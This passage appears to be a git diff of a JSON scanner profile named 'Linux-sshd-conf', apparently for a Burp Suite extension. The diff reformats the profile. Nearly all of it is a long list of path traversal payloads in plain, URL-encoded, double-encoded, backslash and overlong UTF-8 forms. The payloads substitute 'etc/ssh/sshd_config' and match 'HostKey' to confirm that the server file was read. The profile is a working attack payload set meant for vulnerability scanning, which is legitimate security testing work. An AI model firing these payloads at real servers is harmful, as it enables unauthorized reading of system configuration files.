..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,HostKey"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-sshd-conf","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-sshd-conf","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/ssh/sshd_config","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Linux-sshd-conf",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@Sy3Omda",
+ "Payloads": [
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
